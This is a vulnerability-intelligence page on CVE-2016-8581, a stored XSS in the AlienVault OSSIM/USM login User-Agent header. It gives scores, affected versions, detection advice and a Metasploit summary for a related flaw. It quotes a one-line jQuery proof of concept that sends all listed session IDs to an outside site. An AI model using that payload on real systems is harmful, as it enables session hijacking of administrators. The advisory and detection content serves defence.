CVE-2016-8581
published 2016-10-28CVE-2016-8581: A persistent XSS vulnerability exists in the User-Agent header of the login process of AlienVault OSSIM and USM before 5.3.2 that allows an attacker to steal…
PriorityP347medium6.1CVSS 3.0
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
17.06%
96.7th percentile
A persistent XSS vulnerability exists in the User-Agent header of the login process of AlienVault OSSIM and USM before 5.3.2 that allows an attacker to steal session IDs of logged in users when the current sessions are viewed by an administrator.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alienvault | open_source_security_information_and_event_management | <= 5.3.1 | — |
| alienvault | unified_security_management | <= 5.3.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP login requests for JavaScript payloads injected into the User-Agent header, particularly those containing jQuery $.get() calls or session-harvesting patterns targeting the 'Current Sessions' page. ↗
- →Alert on User-Agent header values containing HTML/JavaScript tags (e.g., <script>, jQuery selectors, $.get, $.post) in authentication requests to AlienVault OSSIM/USM login endpoints. ↗
- →Inspect the 'Current Sessions' admin page (#ops_table .ops_id) for unexpected outbound GET requests triggered by stored XSS payloads in User-Agent fields. ↗
- ·The PoC exfiltrates session IDs to an attacker-controlled external URL via HTTP GET with a 'session' parameter; the Google URL in the PoC is a placeholder — real attacks would use an attacker-controlled domain. ↗
- ·Affected versions are AlienVault OSSIM and USM prior to 5.3.2; the vulnerability is fixed in version 5.3.2. ↗
- ·The Metasploit module (alienvault_sqli_exec.rb) referenced in the sources targets a different CVE (SQL injection + RCE in OSSIM ≤4.3.1) and is NOT directly related to CVE-2016-8581; treat its intel separately. ↗
CVSS provenance
nvdv3.06.1MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Alienvault OSSIM/USM 5.3.1 - Persistent Cross-Site Scripting
exploitdb·2016-11-02·CVSS 6.1
CVE-2016-8581 [MEDIUM] Alienvault OSSIM/USM 5.3.1 - Persistent Cross-Site Scripting
Alienvault OSSIM/USM 5.3.1 - Persistent Cross-Site Scripting
---
Details
Product: Alienvault OSSIM/USM
Vulnerability: Stored XSS
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8581
CVSS: 3.5
Vulnerable Versions: Current Sessions.
POC
===
The POC uses jQuery to send all session IDs on the "Current Sessions"
page to an arbitrary site (Google, in this case)
$('#ops_table
.ops_id').each(function(){$.get("https://www.google.com/",{session:($(this).html())});});
Timeline
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2
References
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
Metasploit
AlienVault OSSIM SQL Injection and Remote Code Execution
metasploit
AlienVault OSSIM SQL Injection and Remote Code Execution
AlienVault OSSIM SQL Injection and Remote Code Execution
This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an active admin session ID. If an administrator level user is identified, remote code execution can be gained by creating a high priority policy with an action containing our payload.
No writeups or analysis indexed.
http://www.securityfocus.com/bid/93862https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilitieshttps://www.exploit-db.com/exploits/40683/http://www.securityfocus.com/bid/93862https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilitieshttps://www.exploit-db.com/exploits/40683/
2016-10-28
Published